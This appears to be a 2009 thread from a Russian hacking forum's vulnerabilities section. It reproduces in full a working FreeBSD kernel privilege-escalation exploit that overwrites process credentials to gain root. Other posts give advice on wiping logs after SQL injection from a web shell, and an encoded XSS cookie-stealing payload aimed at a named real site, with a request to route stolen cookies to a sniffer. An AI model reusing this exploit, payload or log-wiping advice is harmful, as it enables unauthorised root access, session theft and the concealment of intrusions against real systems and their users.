ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 19.09.2009, 11:14
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

http://forum.antichat.ru/thread52195.html
 
Ответить с цитированием

  #2  
Старый 19.09.2009, 11:27
SeNaP
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
С нами: 9347610

Репутация: 165
По умолчанию

Может не в ту тему я попал, извиняйте меня
Кто может скомпилировать ?
Код:
/*
* This is a quick and very dirty exploit for the FreeBSD protosw vulnerability
* defined here: 
* http://security.freebsd.org/advisories/FreeBSD-SA-08:13.protosw.asc
*
* This will overwrite your credential structure in the kernel. This will 
* affect more than just the exploit's process, which is why this doesn't
* spawn a shell. When the exploit has finished, your login shell should
* have euid=0. 
*
* Enjoy, and happy holidays!
*  - Don "north" Bailey (don.bailey@gmail.com) 12/25/2008
*/

#include <sys/mman.h>
#include <sys/time.h>
#include <sys/stat.h>
#include <sys/proc.h>
#include <sys/types.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netgraph/ng_socket.h>
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
#include <errno.h>

#define PAGES 1
#define PATTERN1 0x8f8f8f8f
#define PATTERN2 0x6e6e6e6e

typedef unsigned long ulong;
typedef unsigned char uchar;

int
x(void)
{
    struct proc * p = (struct proc * )PATTERN1;
    uint * i;

    while(1)
    {
        if(p->p_pid == PATTERN2)
        {
            i = (uint * )p->p_ucred;
            *++i = 0;
            break;
        }

        p = p->p_list.le_next;
    }

    return 1;
}

int
main(int argc, char * argv[])
{
    ulong addr;
    uchar * c;
    uchar * d;
    uint * i;
    void * v;
    int pid;
    int s;

    if(argc != 2)
    {
        fprintf(stderr, "usage: ./x <allproc>\n");
        return 1;
    }

    addr = strtoul(argv[1], 0, 0);

    v = mmap(
        NULL,
        (PAGES*PAGE_SIZE),
        PROT_READ|PROT_WRITE|PROT_EXEC, 
        MAP_ANON|MAP_FIXED, 
        -1, 
        0);
    if(v == MAP_FAILED)
    {
        perror("mmap");
        return 0;
    }

    c = v;
    d = (uchar * )x;
    while(1)
    {
        *c = *d;
        if(*d == 0xc3)
        {
            break;
        }

        d++;
        c++;
    }

    *c++ = 0xc3;

    c = v;
    while(1)
    {
        if(*(long * )c == PATTERN1)
        {
            *(c + 0) = addr >>  0;
            *(c + 1) = addr >>  8;
            *(c + 2) = addr >> 16;
            *(c + 3) = addr >> 24;
            break;
        }
        c++;
    }

    pid = getpid();
    while(1)
    {
        if(*(long * )c == PATTERN2)
        {
            *(c + 0) = pid >>  0;
            *(c + 1) = pid >>  8;
            *(c + 2) = pid >> 16;
            *(c + 3) = pid >> 24;
            break;
        }
        c++;
    }

    s = socket(PF_NETGRAPH, SOCK_DGRAM, NG_DATA);
    if(s < 0)
    {
        perror("socket");
        return 1;
    }

    shutdown(s, SHUT_RDWR);

    return 0;
}
А то у меня не получается

Последний раз редактировалось SeNaP; 19.09.2009 в 11:30..
 
Ответить с цитированием

  #3  
Старый 19.09.2009, 22:32
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Цитата:
Больше интересует 2 вопрос, про то какие логи надо подтерать
попробуй тулзу vanish2 , оно автоматом почистит.
 
Ответить с цитированием

  #4  
Старый 20.09.2009, 11:56
Byrger
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами: 9567480

Репутация: 61
По умолчанию

Цитата:
Сообщение от warlok  
попробуй тулзу vanish2 , оно автоматом почистит.
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
 
Ответить с цитированием

  #5  
Старый 20.09.2009, 12:03
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 568
С нами: 9030566

Репутация: 2017


По умолчанию

Цитата:
Сообщение от Byrger  
Я из под WEB-шелла сижу.
Нужно почистить логи он SQL-inj тоесть от ерроров
http://forum.antichat.net/threadnav49775-1-10.html

тут посмари где лежат логи и по логике ищи
 
Ответить с цитированием

  #6  
Старый 20.09.2009, 11:25
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
 
Ответить с цитированием

  #7  
Старый 20.09.2009, 12:16
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами: 9410786

Репутация: 2731


По умолчанию

Цитата:
Сообщение от Cehennem  
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
На ачате уже много раз обсуждалось. Создавай картинку с помощью js.

Последний раз редактировалось mailbrush; 20.09.2009 в 12:18..
 
Ответить с цитированием

  #8  
Старый 20.09.2009, 15:19
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
Question

Цитата:
Сообщение от mailbrush  
Сообщение от Cehennem
Привет всем. Опять у меня вопрос. Вопрос про xss.
Нашёл xss: http://berserk.mail.ru/gallery/docs/showdoc.php?css=%22%3E%3Cscript%3Ealert(document.c ookie)%3C/script%3E%3C
Пошёл и сгенерировал на сайте http://cehennem.hut1.ru/1sdfjkfa89we7vnyr7892ny3789y12893ny489789sdy789ad8 9sj8sduisdfsdjizxcyuvxcyuzbcn73fgesy7dcg3.php
И мне вдал ссылку: [img]javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59));[/img]
Зашёл на ссылку javascript:eval(String.fromCharCode(105,109,103,61 ,110,101,119,32,73,109,97,103,101,40,41,59,105,109 ,103,46,115,114,99,61,34,104,116,116,112,58,47,47, 98,101,114,115,101,114,107,46,109,97,105,108,46,11 4,117,47,103,97,108,108,101,114,121,47,100,111,99, 115,47,115,104,111,119,100,111,99,46,112,104,112,6 3,99,115,115,61,63,34,43,100 ,111,99,117,109,101,110,116,46,99,111,111,107,105, 101,59))
Мне показал мои куки.
Теперь что в ссылке изменить чтобы все посылало на сниффер, куда сувать код сниффера?
Ну никто не ответит? Я знаю что для вас не трудно. Если не помешает поставьте из любого сниффера код в javascript xss, а потом я пойму.

плизззззззззз
 
Ответить с цитированием

  #9  
Старый 20.09.2009, 12:19
Cehennem
Banned
Регистрация: 03.06.2009
Сообщений: 28
С нами: 8915055

Репутация: -26
По умолчанию

mailbrush я не понял? Можешь вделить то место на коде javascripta, куда нужно поставить код сниффера или сам постав код сниффера, а я сам догадаюсь уже.
 
Ответить с цитированием

  #10  
Старый 20.09.2009, 14:23
BlackSun
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами: 10058786

Репутация: 4589


По умолчанию

Это краткое описание уязвимостей php.
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.